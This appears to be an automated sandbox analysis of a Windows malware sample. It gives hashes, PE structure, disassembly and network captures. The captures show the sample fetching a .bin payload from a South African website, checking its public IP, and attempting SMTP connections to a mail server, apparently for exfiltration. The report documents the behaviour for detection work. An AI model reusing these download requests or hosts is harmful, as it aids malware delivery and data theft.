                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:hnTW5HdWvY.exe
                                                                        File size:541'940 bytes
                                                                        MD5:d32a9f003d7d44f7839d1e73ab0880dc
                                                                        SHA1:600da56efcbe1f1ecfbf984b6f7f1103e067e43d
                                                                        SHA256:6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494
                                                                        SHA512:3793e6e86cb401bc0476f498a75222672753c89b18b1895e800c918d4c64d2d2247370bfa954ba4d3653fc088d864e4a829d0154b6d0444d3d61b9e66a9c5168
                                                                        SSDEEP:12288:ZCcSi5DOVYoesQTkvn50uFD4SylLXueay:ZoigJvpaLXu6
                                                                        TLSH:A6B4C0E1B38188CAF8A766764C2FD93021B35DBDC491560F71EA7B259DF3352009BA4B
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L....f.R.................\....9....
                                                                        Icon Hash:39785c7efefefaf8
                                                                        Entrypoint:0x4030cb
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x52BA669C [Wed Dec 25 05:01:16 2013 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:e160ef8e55bb9d162da4e266afd9eef3
                                                                        Instruction
                                                                        sub esp, 00000184h
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor ebx, ebx
                                                                        push edi
                                                                        mov dword ptr [esp+18h], ebx
                                                                        mov dword ptr [esp+10h], 00409190h
                                                                        mov dword ptr [esp+20h], ebx
                                                                        mov byte ptr [esp+14h], 00000020h
                                                                        call dword ptr [00407034h]
                                                                        push 00008001h
                                                                        call dword ptr [0040711Ch]
                                                                        push ebx
                                                                        call dword ptr [0040728Ch]
                                                                        push 00000008h
                                                                        mov dword ptr [007A1FB8h], eax
                                                                        call 00007F29E4D1DDBAh
                                                                        mov dword ptr [007A1F04h], eax
                                                                        push ebx
                                                                        lea eax, dword ptr [esp+38h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push ebx
                                                                        push 0079D4B8h
                                                                        call dword ptr [00407164h]
                                                                        push 00409180h
                                                                        push 007A1700h
                                                                        call 00007F29E4D1DA64h
                                                                        call dword ptr [00407120h]
                                                                        mov ebp, 007A7000h
                                                                        push eax
                                                                        push ebp
                                                                        call 00007F29E4D1DA52h
                                                                        push ebx
                                                                        call dword ptr [00407118h]
                                                                        cmp byte ptr [007A7000h], 00000022h
                                                                        mov dword ptr [007A1F00h], eax
                                                                        mov eax, ebp
                                                                        jne 00007F29E4D1B02Ch
                                                                        mov byte ptr [esp+14h], 00000022h
                                                                        mov eax, 007A7001h
                                                                        push dword ptr [esp+14h]
                                                                        push eax
                                                                        call 00007F29E4D1D4E2h
                                                                        push eax
                                                                        call dword ptr [00407220h]
                                                                        mov dword ptr [esp+1Ch], eax
                                                                        jmp 00007F29E4D1B0E5h
                                                                        cmp cl, 00000020h
                                                                        jne 00007F29E4D1B028h
                                                                        inc eax
                                                                        cmp byte ptr [eax], 00000020h
                                                                        je 00007F29E4D1B01Ch
                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d10000x28460.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x5bc60x5c001c2121f50aaec3e631d6b7fee7746690False0.682022758152174data6.511374859754948IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x70000x11ce0x1200640f709ec19b4ed0455a4c64e5934d5eFalse0.4520399305555556OpenPGP Secret Key5.23558258677739IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x90000x398ff80x400b0f803610c3eabc488111ca7ad209e8funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .ndata0x3a20000x2f0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x3d10000x284600x28600e3bcc83e0ea219acebebf71bfbb5b1b1False0.1932626257739938data4.371839987828179IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x3d13580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.16202827398556727
                                                                        RT_ICON0x3e1b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.1903773386588186
                                                                        RT_ICON0x3eb0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.21769870609981515
                                                                        RT_ICON0x3f04b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.21817430325932924
                                                                        RT_ICON0x3f46d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.26649377593360996
                                                                        RT_ICON0x3f6c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.3374765478424015
                                                                        RT_ICON0x3f7d280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.39549180327868855
                                                                        RT_ICON0x3f86b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.499113475177305
                                                                        RT_DIALOG0x3f8b180x100dataEnglishUnited States0.5234375
                                                                        RT_DIALOG0x3f8c180x11cdataEnglishUnited States0.6091549295774648
                                                                        RT_DIALOG0x3f8d380xc4dataEnglishUnited States0.5918367346938775
                                                                        RT_DIALOG0x3f8e000x60dataEnglishUnited States0.7291666666666666
                                                                        RT_GROUP_ICON0x3f8e600x76dataEnglishUnited States0.7457627118644068
                                                                        RT_VERSION0x3f8ed80x27cdataEnglishUnited States0.5110062893081762
                                                                        RT_MANIFEST0x3f91580x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                        DLLImport
                                                                        KERNEL32.dllGetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
                                                                        USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                        GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                        ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                        COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                        ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 5, 2024 14:29:30.607944965 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:30.607971907 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:30.608048916 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:30.618583918 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:30.618597031 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:31.409698009 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:31.409822941 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:31.462735891 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:31.462773085 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:31.463257074 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:31.463326931 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:31.467201948 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:31.512238979 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.185168028 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.185208082 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.185363054 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.185363054 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.185384989 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.185431004 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.574750900 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.574769020 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.574882984 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.575306892 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.575370073 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.576209068 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.576277971 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.662112951 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.662194967 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.967374086 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.967390060 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.967454910 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.967787981 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.967847109 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.968365908 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.968430996 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.968723059 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.968782902 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:32.969110012 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:32.969165087 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.007661104 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.007775068 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.052598953 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.052675962 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.357769966 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.357814074 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.357899904 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.358783007 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.358854055 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.359581947 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.359658957 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.360053062 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.360112906 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.360893011 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.360955954 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.363617897 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.363698959 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.364008904 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.364067078 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.364495993 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.364557028 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.364875078 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.364933014 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.365427017 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.365494013 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.365847111 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.365906000 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.397474051 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.397674084 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.442064047 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.442148924 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.442998886 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.443084955 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.746762991 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.746778011 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.746896029 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.747373104 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.747486115 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.748425961 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.748524904 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.749711990 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.749813080 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.750442028 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.750509977 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:33.750530005 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.750593901 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.750843048 CEST49736443192.168.2.4102.67.137.82
                                                                        Apr 5, 2024 14:29:33.750859022 CEST44349736102.67.137.82192.168.2.4
                                                                        Apr 5, 2024 14:29:34.727952957 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:34.727988958 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:34.728061914 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:34.729635000 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:34.729650021 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:34.993541002 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:34.993613958 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:34.995945930 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:34.995951891 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:34.996200085 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:34.999180079 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:35.040240049 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:35.336438894 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:35.336507082 CEST44349737104.26.12.205192.168.2.4
                                                                        Apr 5, 2024 14:29:35.336554050 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:35.339381933 CEST49737443192.168.2.4104.26.12.205
                                                                        Apr 5, 2024 14:29:35.468311071 CEST4973880192.168.2.4208.95.112.1
                                                                        Apr 5, 2024 14:29:35.617567062 CEST8049738208.95.112.1192.168.2.4
                                                                        Apr 5, 2024 14:29:35.618913889 CEST4973880192.168.2.4208.95.112.1
                                                                        Apr 5, 2024 14:29:35.618954897 CEST4973880192.168.2.4208.95.112.1
                                                                        Apr 5, 2024 14:29:35.769764900 CEST8049738208.95.112.1192.168.2.4
                                                                        Apr 5, 2024 14:29:35.823178053 CEST4973880192.168.2.4208.95.112.1
                                                                        Apr 5, 2024 14:29:37.071132898 CEST4973880192.168.2.4208.95.112.1
                                                                        Apr 5, 2024 14:29:37.220423937 CEST8049738208.95.112.1192.168.2.4
                                                                        Apr 5, 2024 14:29:37.220551014 CEST4973880192.168.2.4208.95.112.1
                                                                        Apr 5, 2024 14:29:38.245733976 CEST49739587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:29:39.245085955 CEST49739587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:29:41.245115995 CEST49739587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:29:45.245493889 CEST49739587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:29:53.260687113 CEST49739587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:29:59.311420918 CEST49741587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:30:00.323172092 CEST49741587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:30:02.323193073 CEST49741587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:30:06.323591948 CEST49741587192.168.2.441.76.215.87
                                                                        Apr 5, 2024 14:30:14.323287964 CEST49741587192.168.2.441.76.215.87
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 5, 2024 14:29:27.937371016 CEST6313153192.168.2.41.1.1.1
                                                                        Apr 5, 2024 14:29:28.932619095 CEST6313153192.168.2.41.1.1.1
                                                                        Apr 5, 2024 14:29:29.666644096 CEST53631311.1.1.1192.168.2.4
                                                                        Apr 5, 2024 14:29:29.666661978 CEST53631311.1.1.1192.168.2.4
                                                                        Apr 5, 2024 14:29:34.599587917 CEST5649053192.168.2.41.1.1.1
                                                                        Apr 5, 2024 14:29:34.724447966 CEST53564901.1.1.1192.168.2.4
                                                                        Apr 5, 2024 14:29:35.342222929 CEST6440053192.168.2.41.1.1.1
                                                                        Apr 5, 2024 14:29:35.466835022 CEST53644001.1.1.1192.168.2.4
                                                                        Apr 5, 2024 14:29:37.071944952 CEST5003353192.168.2.41.1.1.1
                                                                        Apr 5, 2024 14:29:38.057656050 CEST5003353192.168.2.41.1.1.1
                                                                        Apr 5, 2024 14:29:38.244194984 CEST53500331.1.1.1192.168.2.4
                                                                        Apr 5, 2024 14:29:38.244252920 CEST53500331.1.1.1192.168.2.4
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Apr 5, 2024 14:29:27.937371016 CEST192.168.2.41.1.1.10x949Standard query (0)lifeartfertility.co.zaA (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:28.932619095 CEST192.168.2.41.1.1.10x949Standard query (0)lifeartfertility.co.zaA (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:34.599587917 CEST192.168.2.41.1.1.10xd232Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:35.342222929 CEST192.168.2.41.1.1.10xc1b2Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:37.071944952 CEST192.168.2.41.1.1.10x4422Standard query (0)mail.legodimo.co.zaA (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:38.057656050 CEST192.168.2.41.1.1.10x4422Standard query (0)mail.legodimo.co.zaA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Apr 5, 2024 14:29:29.666644096 CEST1.1.1.1192.168.2.40x949No error (0)lifeartfertility.co.za102.67.137.82A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:29.666661978 CEST1.1.1.1192.168.2.40x949No error (0)lifeartfertility.co.za102.67.137.82A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:34.724447966 CEST1.1.1.1192.168.2.40xd232No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:34.724447966 CEST1.1.1.1192.168.2.40xd232No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:34.724447966 CEST1.1.1.1192.168.2.40xd232No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:35.466835022 CEST1.1.1.1192.168.2.40xc1b2No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:38.244194984 CEST1.1.1.1192.168.2.40x4422No error (0)mail.legodimo.co.zalegodimo.co.zaCNAME (Canonical name)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:38.244194984 CEST1.1.1.1192.168.2.40x4422No error (0)legodimo.co.za41.76.215.87A (IP address)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:38.244252920 CEST1.1.1.1192.168.2.40x4422No error (0)mail.legodimo.co.zalegodimo.co.zaCNAME (Canonical name)IN (0x0001)false
                                                                        Apr 5, 2024 14:29:38.244252920 CEST1.1.1.1192.168.2.40x4422No error (0)legodimo.co.za41.76.215.87A (IP address)IN (0x0001)false
                                                                        • lifeartfertility.co.za
                                                                        • api.ipify.org
                                                                        • ip-api.com
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449738208.95.112.1807456C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Apr 5, 2024 14:29:35.618954897 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                        Host: ip-api.com
                                                                        Connection: Keep-Alive
                                                                        Apr 5, 2024 14:29:35.769764900 CEST175INHTTP/1.1 200 OK
                                                                        Date: Fri, 05 Apr 2024 12:29:35 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 6
                                                                        Access-Control-Allow-Origin: *
                                                                        X-Ttl: 60
                                                                        X-Rl: 44
                                                                        Data Raw: 66 61 6c 73 65 0a
                                                                        Data Ascii: false


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449736102.67.137.824437456C:\Program Files (x86)\Windows Mail\wab.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-04-05 12:29:31 UTC184OUTGET /dKatzZJXqh143.bin HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                        Host: lifeartfertility.co.za
                                                                        Cache-Control: no-cache
                                                                        2024-04-05 12:29:32 UTC223INHTTP/1.1 200 OK
                                                                        Date: Fri, 05 Apr 2024 12:29:31 GMT
                                                                        Server: Apache
                                                                        Last-Modified: Thu, 28 Mar 2024 07:35:17 GMT
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 246336
                                                                        Connection: close
                                                                        Content-Type: application/octet-stream
                                                                        2024-04-05 12:29:32 UTC7969INData Raw: c8 9f ed 47 31 da 8a 5c 46 67 65 dc d9 01 bf 62 9c a2 d2 fd c2 96 9c ef 49 d6 7f 86 91 aa fe b2 53 0c 98 e8 12 28 e8 76 03 45 a9 5e 14 a8 6f 40 72 bb 3b cb 29 7f 79 d3 2c 2d 05 82 48 e8 f9 33 a3 13 d7 7c 2d c1 d3 cb 85 92 30 96 41 b2 f8 c8 70 90 44 f1 57 80 df 24 5c ff 9a 0e 20 70 eb ec d0 bb d1 9b a5 23 99 59 cf 1f 35 e9 6d e9 33 4b 01 e6 6e e8 b8 a1 4d b1 6e f5 d6 b4 1e fa 2c ce 84 cc 4e 32 9f 02 6a 1c a5 c2 5f d6 37 22 aa f7 1b ac 97 ee 05 a0 06 e5 d0 a9 3e 0f 77 c5 cb 2b 18 db 82 51 67 1b 1a 1a df df 2a 79 32 32 ac 8a f8 2b 82 6c d0 3a c0 f0 a0 f2 19 da c2 54 03 18 e5 f1 4b 41 18 6b ea 01 95 b4 b2 9e 73 0e 3b 50 c7 9d 97 e5 63 fd 3b f4 56 3a c7 73 8d c6 a5 04 87 03 55 4d 7c 54 15 44 e4 cd 1f cc 81 f6 04 6c 6e 3d 99 9b d8 c3 01 8d 3a 0b 3c 90 f7 87 d6
                                                                        Data Ascii: G1\FgebIS(vE^o@r;)y,-H3|-0ApDW$\ p#Y5m3KnMn,N2j_7">w+Qg*y22+l:TKAks;Pc;V:sUM|TDln=:<
